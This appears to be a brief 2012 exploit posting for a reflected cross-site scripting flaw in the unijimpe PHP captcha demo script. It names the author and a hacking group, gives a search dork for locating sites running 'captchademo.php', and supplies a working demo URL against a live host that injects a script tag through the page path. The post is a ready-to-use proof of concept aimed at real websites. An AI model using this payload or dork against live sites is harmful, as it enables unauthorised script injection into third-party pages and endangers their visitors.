Unijimpe Captcha suffers from a cross site scripting vulnerability.
c9ffa6f225a88c626b7fb1d77ea68e165963c1478a15e7002f9086141d811ccd
# Exploit Title: Captcha (unijimpe) XSS Vulnerability
# Date: 15/05/2012
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# http://blog.unijimpe.net/crear-captcha-con-php/
# Tested on: Linux
# Dork: allinurl: "captchademo.php"
[Comment]
Greetz: MaztoR
www.remoteexecution.info www.remoteexcution.com.ar
#RemoteExecution Hacking Group
[DEMO]
http://samples.unijimpe.net/captchademo.php/%22%3E%3Cscript%3Ealert%28%27pwned%27%29%3C/script%3E
-------------------------
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com